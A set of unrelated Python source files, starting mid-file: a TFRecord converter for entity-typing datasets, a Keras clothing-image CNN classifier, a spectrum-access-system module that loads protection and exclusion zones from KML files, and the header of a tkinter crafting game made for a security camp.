str(end)
]), 'utf-8')
# lc and rc does not include mention
# as mentioned in AKBC paper
if context_window:
left_context = tokens[:start][-context_window:]
right_context = tokens[end:][:context_window]
else:
left_context = tokens[:start]
right_context = tokens[end:]
if mention_window:
entity = tokens[start:end][:mention_window]
else:
entity = tokens[start:end]
ex = tf.train.SequenceExample()
ex.context.feature["uid"].bytes_list.value.append(uid)
ex.context.feature["lcl"].int64_list.value.append(len(left_context))
ex.context.feature["rcl"].int64_list.value.append(len(right_context))
ex.context.feature["eml"].int64_list.value.append(len(entity))
# This will only be used in representations experiment.
ex.context.feature["clean"].int64_list.value.append(labels_status(mention['labels']))
lc_ids = ex.feature_lists.feature_list["lci"]
rc_ids = ex.feature_lists.feature_list["rci"]
em_ids = ex.feature_lists.feature_list["emi"]
label_list = ex.feature_lists.feature_list["labels"]
for word in left_context:
lc_ids.feature.add().int64_list.value.append(mappings['wtn'].get(word,
mappings['wtn']['unk']))
for word in right_context:
rc_ids.feature.add().int64_list.value.append(mappings['wtn'].get(word,
mappings['wtn']['unk']))
for word in entity:
em_ids.feature.add().int64_list.value.append(mappings['wtn'].get(word,
mappings['wtn']['unk']))
temp_labels = [0] * len(mappings['ltn'])
for label in mention['labels']:
temp_labels[mappings['ltn'][label]] = 1
for label in temp_labels:
label_list.feature.add().int64_list.value.append(label)
return ex
def data_format_f1(in_filepath, out_filepath, mappings):
"""
Convert json file to tfrecord.
"""
total = 0
with open(in_filepath, 'r') as file_p1, open(out_filepath, 'wb') as file_p2:
writer = tf.python_io.TFRecordWriter(file_p2.name)
for row in file_p1:
json_data = json.loads(row)
for mention in json_data['mentions']:
ex = make_tf_record_f1(json_data, mention, mappings)
writer.write(ex.SerializeToString())
total += 1
writer.close()
return total
def data_format_f2(in_filepath, out_filepath, mappings):
"""
Convert json file to tfrecord.
"""
total = 0
with open(in_filepath, 'r') as file_p1, open(out_filepath, 'wb') as file_p2:
writer = tf.python_io.TFRecordWriter(file_p2.name)
for row in file_p1:
json_data = json.loads(row)
for mention in json_data['mentions']:
# window width as mentioned in AKBC paper
ex = make_tf_record_f2(json_data, mention, mappings, 5, 15)
writer.write(ex.SerializeToString())
total += 1
writer.close()
return total
def data_format_f5(in_filepath, out_filepath, mappings):
"""
Convert json file to tfrecord.
"""
total = 0
with open(in_filepath, 'r') as file_p1, open(out_filepath, 'wb') as file_p2:
writer = tf.python_io.TFRecordWriter(file_p2.name)
for row in file_p1:
json_data = json.loads(row)
for mention in json_data['mentions']:
ex = make_tf_record_f2(json_data, mention, mappings, None, None)
writer.write(ex.SerializeToString())
total += 1
writer.close()
return total
def data_format_abhishek(dataset, sanitized_directory, glove_vector_filepath, output_directory):
"""
Generate data as needed by our model.
"""
print('Reading words.')
words, _ = _read_words(sanitized_directory + dataset + '/sanitized_train.json')
print('Loading word embeddings.')
word_to_num, embedding, _ = load_filtered_embeddings(glove_vector_filepath, words)
print('Embedding shape', embedding.shape)
print('Generating label to number dictionary.')
label_to_num = generate_labels_to_numbers(dataset, sanitized_directory)
print('Generating pos and dep type to number dictionary.')
pos_to_num, dep_type_to_num = generate_features_to_numbers(dataset, sanitized_directory)
print('Generating character to number dictionary.')
chrs_to_num = _read_mention_chars(sanitized_directory + dataset + '/sanitized_train.json', 5)
mappings = {}
mappings['wtn'] = word_to_num
mappings['ctn'] = chrs_to_num
mappings['ltn'] = label_to_num
mappings['ptn'] = pos_to_num
mappings['dttn'] = dep_type_to_num
print('Generating training data.')
train_size = data_format_f1(sanitized_directory + dataset + '/sanitized_train.json',
output_directory + 'f1/' + dataset + '/train.tfrecord',
mappings
)
print('Generating development data.')
dev_size = data_format_f1(sanitized_directory + dataset + '/sanitized_dev.json',
output_directory + 'f1/' + dataset + '/dev.tfrecord',
mappings
)
print('Generating testing data.')
test_size = data_format_f1(sanitized_directory + dataset + '/sanitized_test.json',
output_directory + 'f1/' + dataset + '/test.tfrecord',
mappings
)
pickle.dump({
'num_to_label': invert_dict(label_to_num),
'num_to_word' : invert_dict(word_to_num),
'num_to_chrs' : invert_dict(chrs_to_num),
'num_to_pos' : invert_dict(pos_to_num),
'num_to_dep_type' : invert_dict(dep_type_to_num),
'word_embedding' : embedding,
'train_size' : train_size,
'dev_size' : dev_size,
'test_size' : test_size
}, open(output_directory + 'f1/' + dataset + '/local_variables.pickle', 'wb'))
def data_format_shimaoka(dataset, sanitized_directory, glove_vector_filepath, output_directory):
"""
Generate data as needed by shimaoka model.
"""
print('Reading words.')
words, _ = _read_words(sanitized_directory + dataset + '/sanitized_train.json')
print('Loading word embeddings.')
word_to_num, embedding, _ = load_filtered_embeddings(glove_vector_filepath, words)
print('Embedding shape', embedding.shape)
print('Generating label to number dictionary.')
label_to_num = generate_labels_to_numbers(dataset, sanitized_directory)
mappings = {}
mappings['wtn'] = word_to_num
mappings['ltn'] = label_to_num
print('Generating training data.')
train_size = data_format_f2(sanitized_directory + dataset + '/sanitized_train.json',
output_directory + 'f2/' + dataset + '/train.tfrecord',
mappings
)
print('Generating development data.')
dev_size = data_format_f2(sanitized_directory + dataset + '/sanitized_dev.json',
output_directory + 'f2/' + dataset + '/dev.tfrecord',
mappings
)
print('Generating testing data.')
test_size = data_format_f2(sanitized_directory + dataset + '/sanitized_test.json',
output_directory + 'f2/' + dataset + '/test.tfrecord',
mappings
)
pickle.dump({
'num_to_label': invert_dict(label_to_num),
'num_to_word' : invert_dict(word_to_num),
'word_embedding' : embedding,
'train_size' : train_size,
'dev_size' : dev_size,
'test_size' : test_size
}, open(output_directory + 'f2/' + dataset + '/local_variables.pickle', 'wb'))
#pylint: disable=invalid-name
def data_format_shimaoka_representation(dataset,
sanitized_directory,
glove_vector_filepath,
output_directory):
"""
Generate data as needed by shimaoka model.
"""
print('Reading words.')
words, _ = _read_words(sanitized_directory + dataset + '/sanitized_train.json')
print('Loading word embeddings.')
word_to_num, embedding, _ = load_filtered_embeddings(glove_vector_filepath, words)
print('Embedding shape', embedding.shape)
print('Generating label to number dictionary.')
label_to_num = generate_labels_to_numbers(dataset, sanitized_directory)
mappings = {}
mappings['wtn'] = word_to_num
mappings['ltn'] = label_to_num
print('Generating training data.')
train_size = data_format_f5(sanitized_directory + dataset + '/sanitized_train.json',
output_directory + 'f5/' + dataset + '/train.tfrecord',
mappings
)
print('Generating development data.')
dev_size = data_format_f5(sanitized_directory + dataset + '/sanitized_dev.json',
output_directory + 'f5/' + dataset + '/dev.tfrecord',
mappings
)
print('Generating testing data.')
test_size = data_format_f5(sanitized_directory + dataset + '/sanitized_test.json',
output_directory + 'f5/' + dataset + '/test.tfrecord',
mappings
)
pickle.dump({
'num_to_label': invert_dict(label_to_num),
'num_to_word' : invert_dict(word_to_num),
'word_embedding' : embedding,
'train_size' : train_size,
'dev_size' : dev_size,
'test_size' : test_size
}, open(output_directory + 'f5/' + dataset + '/local_variables.pickle', 'wb'))
def data_format_transfer_learning(dataset, sanitized_directory, output_directory):
"""
Generate data as needed for finetuning.
"""
# Wiki dataset hard coded.
l_vars = pickle.load(open(output_directory + 'f1/Wiki/' + 'local_variables.pickle', 'rb'))
embedding = l_vars['word_embedding']
print('Embedding shape', embedding.shape)
print('Generating label to number dictionary.')
label_to_num = generate_labels_to_numbers(dataset, sanitized_directory)
word_to_num = invert_dict(l_vars['num_to_word'])
chrs_to_num = invert_dict(l_vars['num_to_chrs'])
pos_to_num = invert_dict(l_vars['num_to_pos'])
dep_type_to_num = invert_dict(l_vars['num_to_dep_type'])
mappings = {}
mappings['wtn'] = word_to_num
mappings['ctn'] = chrs_to_num
mappings['ltn'] = label_to_num
mappings['ptn'] = pos_to_num
mappings['dttn'] = dep_type_to_num
print('Generating training data.')
train_size = data_format_f1(sanitized_directory + dataset + '/sanitized_train.json',
output_directory + 'f3/' + dataset + '/train.tfrecord',
mappings
)
print('Generating development data.')
dev_size = data_format_f1(sanitized_directory + dataset + '/sanitized_dev.json',
output_directory + 'f3/' + dataset + '/dev.tfrecord',
mappings
)
print('Generating testing data.')
test_size = data_format_f1(sanitized_directory + dataset + '/sanitized_test.json',
output_directory + 'f3/' + dataset + '/test.tfrecord',
mappings
)
pickle.dump({
'num_to_label': invert_dict(label_to_num),
'num_to_word' : invert_dict(word_to_num),
'num_to_chrs' : invert_dict(chrs_to_num),
'num_to_pos' : invert_dict(pos_to_num),
'num_to_dep_type' : invert_dict(dep_type_to_num),
'word_embedding' : embedding,
'train_size' : train_size,
'dev_size' : dev_size,
'test_size' : test_size
}, open(output_directory + 'f3/' + dataset + '/local_variables.pickle', 'wb'))
if __name__ == '__main__':
if len(sys.argv) != 6:
print('Usage: dataset sanitized_directory glove_vector_filepath format output_directory')
sys.exit(0)
else:
FORMAT = sys.argv[4]
if FORMAT == 'f1':
data_format_abhishek(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[5])
elif FORMAT == 'f2':
data_format_shimaoka(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[5])
elif FORMAT == 'f3':
data_format_transfer_learning(sys.argv[1], sys.argv[2], sys.argv[5])
elif FORMAT == 'f5':
data_format_shimaoka_representation(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[5])
|
#! -*- coding: utf-8 -*-
import glob
import numpy as np
from keras.preprocessing.image import load_img, img_to_array, array_to_img
from keras.preprocessing.image import random_rotation, random_shift, random_zoom
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.core import Activation
from keras.layers.core import Dense
from keras.layers.core import Dropout
from keras.layers.core import Flatten
from keras.models import Sequential
from keras.models import model_from_json
from keras.callbacks import LearningRateScheduler
from keras.callbacks import ModelCheckpoint
from keras.optimizers import Adam, RMSprop
from keras.utils import np_utils
import keras
import random
from PIL import Image
from pathlib import Path
from sklearn.model_selection import train_test_split
import scipy
import cv2
import matplotlib.pyplot as plt
# 空リスト作成
x_train=[]
y_train=[]
x_test=[]
y_test=[]
# ラベル作成
y_dic = {0:"Denim", 1:"Jackets_Vests", 2:"Pants", 3:"Shirts_Polos", 4:"Shorts",
5:"Suiting", 6:"Sweaters", 7:"Sweatshirts_Hoodies", 8:"Tees_Tanks"}
def PocFunc(f):
f = np.float32(f)
#RGBに分解
b = f[:,:,0]
g = f[:,:,1]
r = f[:,:,2]
#二次元離散フーリエ変換
B = scipy.fft(b)
G = scipy.fft(g)
R = scipy.fft(r)
# 強度で正規化、逆フーリエ変換、実部を取り出す
b = np.real(scipy.ifft(B/np.abs(B)))
g = np.real(scipy.ifft(G/np.abs(G)))
r = np.real(scipy.ifft(R/np.abs(R)))
f_new = np.stack([b,g,r],axis=2)
return f_new
def PreProcess(pc=False):
# ファイル検索
x_path_list = glob.glob('/Users/tesiyosi/dev/harada_intel/dataset/MEN/*/*/??_1_front.jpg')
x_train=[]
y_train=[]
x_test=[]
y_test=[]
x = []
y = []
for path in x_path_list:
# 画像取得
im = np.array(Image.open(path))
if pc == True:
im = PocFunc(im)
# 辞書を検索して分類を番号化
lab = [k for k, v in y_dic.items() if v == Path(path).parts[-3]][0]
x.append(im)
y.append(lab)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25, random_state=100, stratify=y)
x_train = np.array(x_train)
x_test = np.array(x_test)
x_train = x_train.reshape(x_train.shape[0],256,256,3)
x_test = x_test.reshape(x_test.shape[0],256,256,3)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
y_train = keras.utils.to_categorical(y_train, 9)
y_test = keras.utils.to_categorical(y_test, 9)
return (x_train, y_train), (x_test, y_test)
################################
######### モデルの構築 #########
################################
def BuildCNN():
img_width, img_height = 256, 256
nb_filters1 = 32
nb_filters2 = 64
conv1_size = 3
conv2_size = 2
pool_size = 2
classes_num = 9
lr = 0.0004
model = Sequential()
model.add(Conv2D(nb_filters1, kernel_size=(conv1_size, conv1_size), activation='relu', input_shape=(img_width, img_height, 3)))
model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))
model.add(Conv2D(nb_filters2, kernel_size=(conv2_size, conv2_size), activation='relu'))
model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))
model.add(Flatten())
model.add(Dense(256,activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(classes_num, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(lr=lr),
metrics=['accuracy'])
return model
################################
############# 学習 #############
################################
def Learning():
model = BuildCNN()
(x_train, y_train), (x_test, y_test) = PreProcess(pc=False)
history = model.fit(x_train, y_train,epochs=10)
model.summary()
score = model.evaluate(x_test, y_test)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
Learning() |
<filename>src/harness/reference_models/geo/zones.py
# Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Zone routines.
These routines allows to read the various zones used by SAS:
- Protection zone for DPA CatA.
- Exclusion zones for Ground Based stations and Part90 Exclusion Zones
- Coastal DPAs.
- Portal DPAs.
- US/Canadian border.
Plus a few other useful zones for evaluation/simulation purpose:
- US Border
- US Urban areas
Interface:
# Exclusion zones
GetGbsExclusionZones()
GetPart90ExclusionZones()
# DPA zones: E-DPA (Coastal/ESC) and P-DPA (Portal)
GetCoastalDpaZones()
GetPortalDpaZones()
# Coastal protection zone - for catA
GetCoastalProtectionZone()
# FCC Office locations
GetFccOfficeLocations()
# US-Canada Border
GetUsCanadaBorder()
# For simulation purpose: global US border and urban areas
GetUsBorder()
GetUrbanAreas()
"""
import logging
import os
import re
import numpy as np
import shapely.geometry as sgeo
import shapely.ops as ops
from pykml import parser
import zipfile
from reference_models.geo import CONFIG
# The reference files.
PROTECTION_ZONE_FILE = 'protection_zones.kml'
EXCLUSION_ZONE_FILE = 'GB_Part90_EZ.kml'
COASTAL_DPA_ZONE_FILE = 'E-DPAs.kml'
PORTAL_DPA_ZONE_FILE = 'P-DPAs.kml'
FCC_FIELD_OFFICES_FILE = 'fcc_field_office_locations.csv'
# The reference files for extra zones.
USBORDER_FILE = 'usborder.kmz'
URBAN_AREAS_FILE = 'Urban_Areas_3601.kmz'
USCANADA_BORDER_FILE = 'uscabdry_sampled.kmz'
# The constants
DPA_CATA_DEFAULT_NEIGHBOR_DIST = 150
# A frequency splitter - used as DPA properties converter.
def _SplitFreqRange(freq_range):
"""Splits a `freq_range` str in a list of numerical (fmin, fmax) tuples."""
try:
fmin, fmax = re.split(',|-', freq_range.strip())
return [(float(fmin), float(fmax))]
except AttributeError:
freq_ranges = []
for one_range in freq_range:
fmin, fmax = re.split(',|-', one_range.strip())
freq_ranges.append((float(fmin), float(fmax)))
return freq_ranges
# The DPA properties to extract from DPA KMLs.
# (attribute, converter, default)
# * attribute: the KML attribute name to extract
# * converter: a converter function (float, str, ..)
# * default: Value to use if unset. If default=None, the attribute is mandatory,
# and an exception will be raised if absent.
# Warning: If modifying, update in dpa_mgr.BuildDpa()
# Warning: currently catbNeighborDist read from separate file, while waiting for
# process finalization.
# For coastal DPAs.
COASTAL_DPA_PROPERTIES = [('freqRangeMHz', _SplitFreqRange, None),
('protectionCritDbmPer10MHz', float, -144),
('refHeightMeters', float, 50),
('antennaBeamwidthDeg', float, 3.),
('minAzimuthDeg', float, 0.),
('maxAzimuthDeg', float, 360.),
('catANeighborhoodDistanceKm', float, DPA_CATA_DEFAULT_NEIGHBOR_DIST),
('catBNeighborhoodDistanceKm', float, None),
('catAOOBNeighborhoodDistanceKm', float, float('nan')),
('catBOOBNeighborhoodDistanceKm', float, float('nan'))]
# For portal DPAs.
PORTAL_DPA_PROPERTIES = [('freqRangeMHz', _SplitFreqRange, None),
('protectionCritDbmPer10MHz', float, None),
('refHeightMeters', float, None),
('antennaBeamwidthDeg', float, None),
('minAzimuthDeg', float, 0),
('maxAzimuthDeg', float, 360),
('catANeighborhoodDistanceKm', float, DPA_CATA_DEFAULT_NEIGHBOR_DIST),
('catBNeighborhoodDistanceKm', float, None),
('catAOOBNeighborhoodDistanceKm', float, float('nan')),
('catBOOBNeighborhoodDistanceKm', float, float('nan')),
('portalOrg', str, None),
('federalOp', bool, None),
('gmfSerialNumber', str, 'None'),
('fccCallSign', str, 'None')]
# One source of data is the the `protection_zones.kml` preprocessed by
# Winnforum (see src/data/), and which holds both the protection zone and
# exclusion zones.
_COASTAL_PROTECTION_ZONES = [
'West Combined Contour', 'East-Gulf Combined Contour'
]
# Singleton for operational zones.
_coastal_protection_zone = None
_exclusion_zones_gbs = None
_exclusion_zones_p90 = None
_coastal_dpa_zones = None
_coastal_dpa_path = None
_portal_dpa_zones = None
_portal_dpa_path = None
_border_zone = None
_uscanada_border = None
def _SplitCoordinates(coord):
"""Returns lon,lat from 'coord', a KML coordinate string field."""
lon, lat, _ = coord.strip().split(',')
return float(lon), float(lat)
def _GetPoint(point):
"""Gets a Point from a placemark."""
coord = point.coordinates.text.strip()
return sgeo.Point(_SplitCoordinates(coord))
def _GetPolygon(poly):
"""Returns a |shapely.geometry.Polygon| from a KML 'Polygon' element."""
out_ring = poly.outerBoundaryIs.LinearRing.coordinates.text.strip().split(' ')
out_points = [_SplitCoordinates(coord) for coord in out_ring]
int_points = []
try:
for inner_boundary in poly.innerBoundaryIs:
inner_ring = inner_boundary.LinearRing.coordinates.text.strip().split(' ')
int_points.append([_SplitCoordinates(coord) for coord in inner_ring])
except AttributeError:
pass
return sgeo.Polygon(out_points, holes=int_points)
def _GetLineString(linestring):
"""Returns a |shapely.geometry.LineString| from a KML 'LineString' element."""
coords = linestring.coordinates.text.strip().split(' ')
points = [_SplitCoordinates(coord) for coord in coords]
return sgeo.LineString(points)
# A private struct for configurable zone with geometry and attributes
class _Zone(object):
"""A simplistic struct holder for zones."""
def __init__(self, fields):
"""Initializes attributes to None for a list of `fields`."""
self.fields = fields
for field in fields:
setattr(self, field, None)
def __repr__(self):
"""Return zone representation."""
return 'Zone(geometry=%s, %s)' % (
'None' if not hasattr(self, 'geometry') else self.geometry.type,
', '.join(['%s=%s' % (attr, getattr(self, attr)) for attr in self.fields]))
def _ReadKmlZones(kml_path, root_id_zone='Placemark', ignore_if_parent=None,
data_fields=None, simplify=0, fix_invalid=True):
"""Gets all the zones defined in a KML.
This assumes that each zone is either a bunch of polygons, or a bunch of points.
Args:
kml_path: The path name to the exclusion zone KML or KMZ.
root_id_zone: The root id defininig a zone. Usually it is 'Placemark'.
data_fields: List of string defining the data fields to extract from the KML
'ExtendedData'. If None, nothing is extracted.
simplify: If set, simplifies the resulting polygons.
fix_invalid: If True, try to fix invalid DPA zone (using buffer(0) trick).
Returns:
A dictionary of elements keyed by their name, with each elements being:
- if no data_fields requested: a |shapely| Polygon/MultiPolygon or Point/MultiPoint
- if data_fields requested:
a struct with attributes:
* 'geometry': a |shapely| Polygon/MultiPolygon or Point/MultiPoint
* the requested data_fields as attributes. The value are string, or None
if the data fields is unset in the KML. If several identical data_fields are
found, they are put in a list.
"""
if kml_path.endswith('kmz'):
with zipfile.ZipFile(kml_path) as kmz:
kml_name = [info.filename for info in kmz.infolist()
if os.path.splitext(info.filename)[1] == '.kml'][0]
with kmz.open(kml_name) as kml_file:
root = parser.parse(kml_file).getroot()
else:
with open(kml_path, 'r') as kml_file:
root = parser.parse(kml_file).getroot()
tag = root.tag[:root.tag.rfind('}')+1]
zones = {}
for element in root.findall('.//' + tag + root_id_zone):
# Ignore nested root_id within root_id
if element.find('.//' + tag + root_id_zone) is not None:
continue
if ignore_if_parent is not None and element.getparent().tag.endswith(ignore_if_parent):
continue
name = element.name.text
# Read the zone geometry
geometry = None
polygons = [_GetPolygon(poly)
for poly in element.findall('.//' + tag + 'Polygon')]
if polygons:
if len(polygons) == 1:
polygon = polygons[0]
else:
polygon = sgeo.MultiPolygon(polygons)
# Fix most invalid polygons
if fix_invalid:
polygon = polygon.buffer(0)
if simplify:
polygon.simplify(simplify)
if not polygon.is_valid:
# polygon is broken and should be fixed upstream
raise ValueError('Polygon %s is invalid and cannot be cured.' % name)
geometry = polygon
else:
points = [_GetPoint(point)
for point in element.findall('.//' + tag + 'Point')]
geometry = ops.unary_union(points)
# Read the data_fields
if data_fields is None:
zones[name] = geometry
else:
zone = _Zone(data_fields)
zone.geometry = geometry
data_fields_lower = [field.lower() for field in data_fields]
zones[name] = zone
ext_data = element.ExtendedData.getchildren()
for data in ext_data:
data_attrib = data.attrib['name']
data_value = str(data.value)
if data_attrib.lower() in data_fields_lower:
if getattr(zone, data_attrib, None) is None:
setattr(zone, data_attrib, data_value)
else:
existing_data = getattr(zone, data_attrib)
try:
existing_data.append(str(data_value))
setattr(zone, data_attrib, existing_data)
except:
setattr(zone, data_attrib, [existing_data, str(data_value)])
return zones
def _ReadKmlBorder(kml_path, root_id='Placemark'):
"""Gets the border defined in a KML.
Args:
kml_path: The path name to the border file KML or KMZ.
root_id_zone: The root id defininig a zone. Usually it is 'Placemark'.
Returns:
A dictionary of |shapely| LineString keyed by their names.
"""
if kml_path.endswith('kmz'):
with zipfile.ZipFile(kml_path) as kmz:
kml_name = [info.filename for info in kmz.infolist()
if os.path.splitext(info.filename)[1] == '.kml'][0]
with kmz.open(kml_name) as kml_file:
root = parser.parse(kml_file).getroot()
else:
with open(kml_path, 'r') as kml_file:
root = parser.parse(kml_file).getroot()
tag = root.tag[:root.tag.rfind('}') + 1]
linetrings_dict = {}
for element in root.findall('.//' + tag + root_id):
# Ignore nested root_id within root_id
if element.find('.//' + tag + root_id) is not None:
continue
name = element.name.text
linestrings = [
_GetLineString(l)
for l in element.findall('.//' + tag + 'LineString')
]
if not linestrings:
continue
if len(linestrings) == 1:
linestring = linestrings[0]
else:
linestring = sgeo.MultiLineString(linestrings)
linetrings_dict[name] = linestring
return linetrings_dict
def _GetAllExclusionZones():
"""Read all exclusion zones."""
global _exclusion_zones_gbs
global _exclusion_zones_p90
if _exclusion_zones_gbs is None:
kml_file = os.path.join(CONFIG.GetNtiaDir(), EXCLUSION_ZONE_FILE)
zones = _ReadKmlZones(kml_file, data_fields=['freqRangeMhz'])
gbs_zones = []
p90_zones = []
for name, zone in zones.items():
freq_range = _SplitFreqRange(zone.freqRangeMhz)
if (3550, 3650) in freq_range:
gbs_zones.append(zone.geometry)
elif (3650, 3700) in freq_range:
p90_zones.append(zone.geometry)
else:
raise ValueError('Zone %s: unsupported freq range %r',
name, freq_range)
_exclusion_zones_gbs = ops.unary_union(gbs_zones)
_exclusion_zones_p90 = ops.unary_union(p90_zones)
def _CheckDpaValidity(dpa_zones, attributes):
"""Checks that DPA is valid, ie all attributes actually set.
Raise:
ValueError: if some attributes unset.
"""
for name, zone in dpa_zones.items():
for attr in attributes:
if getattr(zone, attr) is None:
raise ValueError('DPA %s: attribute %s is unset' % (name, attr))
def _LoadDpaZones(kml_path, properties, fix_invalid=True):
"""Loads DPA zones from a `kml_path` - See GetCoastalDpaZones for returned format.
Args:
kml_path: Path to the DPA KML.
properties: A list of tuple (kml_attribute, converter) for extracting the DPA KML info:
* kml_attr: a string defining the data attribute in the KML
* converter: a converter routine, for example `float`.
fix_invalid: If True, try to fix invalid DPA zone (using buffer(0) trick).
"""
# Manage the case where some items are in a Folder structure instead of Placemark
dpa_zones = _ReadKmlZones(kml_path, root_id_zone='Placemark',
data_fields=[attr for attr,_,_ in properties])
# Validity check that all required parameters are set properly
_CheckDpaValidity(dpa_zones, [attr for attr, _, default in properties
if default is None])
# Now adapt the data with converters and set defaults
for name, zone in dpa_zones.items():
for attr, cvt, default in properties:
value = getattr(zone, attr)
if value is None:
setattr(zone, attr, default)
else:
setattr(zone, attr, cvt(value))
# Check on the neighbor distances and set defaults
# TODO(sbdt): This is temp while final KML are produced.
# Final code should raise an exception for those which are mandatory by the spec,
# and use the standard default for the optional ones.
for name, zone in dpa_zones.items():
# CatA neighborhood specified with default value if not in file,
# so this is managed in the declaration.
# However since the KML are currently using NaN for that param, manage
# the NaN case here.
if np.isnan(zone.catANeighborhoodDistanceKm):
zone.catANeighborhoodDistanceKm = DPA_CATA_DEFAULT_NEIGHBOR_DIST
# Others seems mandatory:
# CatB not yet defined set as NaN
if np.isnan(zone.catBNeighborhoodDistanceKm):
zone.catBNeighborhoodDistanceKm = 200
# OOB distances not yet provided in the KML files, so default to NaN
if np.isnan(zone.catAOOBNeighborhoodDistanceKm):
zone.catAOOBNeighborhoodDistanceKm = 0
if np.isnan(zone.catBOOBNeighborhoodDistanceKm):
zone.catBOOBNeighborhoodDistanceKm = 25
return dpa_zones
#=============================================================
# Public interface below
def GetCoastalProtectionZone():
"""Returns the coastal protection zone as a |shapely.MultiPolygon|.
The coastal protection zone is optionally used for DPA CatA neighborhood.
"""
global _coastal_protection_zone
if _coastal_protection_zone is None:
kml_file = os.path.join(CONFIG.GetNtiaDir(), PROTECTION_ZONE_FILE)
zones = _ReadKmlZones(kml_file)
_coastal_protection_zone = ops.unary_union([zones[name]
for name in _COASTAL_PROTECTION_ZONES])
return _coastal_protection_zone
def GetGbsExclusionZones():
"""Returns all GBS exclusion zones as a |shapely.MultiPolygon|.
The GBS exclusion zone are used for protecting Ground Based Station
transmitting below 3500MHz.
"""
_GetAllExclusionZones()
return _exclusion_zones_gbs
def GetPart90ExclusionZones():
"""Returns all Part90 federal exclusion zones as a |shapely.MultiPolygon|."""
_GetAllExclusionZones()
return _exclusion_zones_p90
def GetCoastalDpaZones(kml_path=None):
"""Gets Coastal DPA zones.
Coastal DPA zones are Dynamic Protection Area monitored through the use of
ESC sensors.
Args:
kml_path: Optional path to the Coastal DPA KML. If unspecified, use the
default one from the `data/ntia/` folder.
Returns:
A dict of DPA struct keyed by their names, each one holding following
attributes:
geometry: A |shapely.Polygon or Point| defining the DPA.
protectionCritDbmPer10MHz: The protection threshold (dBm/10MHz).
refHeightMeters: The radar antenna height (meters).
antennaBeamwidthDeg: The antenna beamwidth (degrees).
minAzimuthDeg: The radar min azimuth (degrees).
maxAzimuthDeg: The radar max azimuth (degrees).
catBNeighborDist: The CatB neighboring distance (km).
"""
global _coastal_dpa_zones
global _coastal_dpa_path
if _coastal_dpa_zones is None or kml_path != _coastal_dpa_path:
_coastal_dpa_path = kml_path
if kml_path is None: kml_path = os.path.join(CONFIG.GetNtiaDir(),
COASTAL_DPA_ZONE_FILE)
_coastal_dpa_zones = _LoadDpaZones(kml_path, COASTAL_DPA_PROPERTIES,
fix_invalid=False)
# fix_invalid to False to auto-detect issues with provided KML.
return _coastal_dpa_zones
def GetPortalDpaZones(kml_path=None):
"""Gets Portal DPA zones.
Portal DPA zones are Dynamic Protection Area monitored through the use of
internet portal.
Args:
kml_path: Optional path to the Portal DPA KML. If unspecified, use the
default one from the `data/ntia/` folder.
Returns:
A dict of DPA struct keyed by their names, each one holding following
attributes:
geometry: A |shapely.Polygon or Point| defining the DPA.
protectionCritDbmPer10MHz: The protection threshold (dBm/10MHz).
refHeightMeters: The radar antenna height (meters).
antennaBeamwidthDeg: The antenna beamwidth (degrees).
minAzimuthDeg: The radar min azimuth (degrees).
maxAzimuthDeg: The radar max azimuth (degrees).
catBNeighborDist: The CatB neighboring distance (km).
"""
global _portal_dpa_zones
global _portal_dpa_path
if _portal_dpa_zones is None or kml_path != _portal_dpa_path:
_portal_dpa_path = kml_path
if kml_path is None: kml_path = os.path.join(CONFIG.GetNtiaDir(),
PORTAL_DPA_ZONE_FILE)
_portal_dpa_zones = _LoadDpaZones(kml_path, PORTAL_DPA_PROPERTIES,
fix_invalid=False)
# fix_invalid to False to auto-detect issues with provided KML.
return _portal_dpa_zones
def GetUsCanadaBorder():
"""Gets the US/Canada border as a |shapely.MultiLineString|."""
global _uscanada_border
if _uscanada_border is None:
kml_file = os.path.join(CONFIG.GetFccDir(), USCANADA_BORDER_FILE)
lines = _ReadKmlBorder(kml_file)
_uscanada_border = ops.unary_union(lines.values())
return _uscanada_border
def GetUsBorder():
"""Gets the US border as a |shapely.MultiPolygon|.
This is a composite US border for simulation purposes only.
"""
global _border_zone
if _border_zone is None:
kml_file = os.path.join(CONFIG.GetFccDir(), USBORDER_FILE)
zones = _ReadKmlZones(kml_file)
_border_zone = ops.unary_union(zones.values())
return _border_zone
def GetUrbanAreas(simplify_deg=1e-3):
"""Gets the US urban area as a |shapely.GeometryCollection|.
Note: Client code should cache it as expensive to load (and not cached here).
Args:
simplify_deg: if defined, simplify the zone with given tolerance (degrees).
Default is 1e-3 which corresponds roughly to 100m in continental US.
"""
kml_file = os.path.join(CONFIG.GetNtiaDir(), URBAN_AREAS_FILE)
zones = _ReadKmlZones(kml_file, root_id_zone='Document', simplify=simplify_deg)
urban_areas = sgeo.GeometryCollection(zones.values()) # ops.unary_union(zones.values())
return urban_areas
def GetFccOfficeLocations():
"""Gets FCC Office locations.
14 FCC field offices that require protection are defined.
Returns:
A list of locations defined as dict with keys 'latitude' and 'longitude'.
"""
fcc_file = os.path.join(CONFIG.GetFccDir(), FCC_FIELD_OFFICES_FILE)
fcc_offices = [{'latitude': lat,
'longitude': lng}
for lat, lng in np.loadtxt(fcc_file, delimiter=',', usecols=(1, 2))]
return fcc_offices
|
########################################################################################################################
"""
Inspired by http://usingpython.com/programs/ 'Crafting Challenge' Game
Created by SimplyNate
Coding Module - Python Lab
Craft the items indicated in the Quests panel to win the game.
Hunger ticks down after each input by the amount indicated below.
When hunger reaches 0, Health will begin ticking down instead after each input.
When health reaches 0, the game ends.
Made for the GenCyber Hawaii SecurityX Camp 2018
"""
########################################################################################################################
# Imports dependencies required for drawing the GUI and other functions
import tkinter
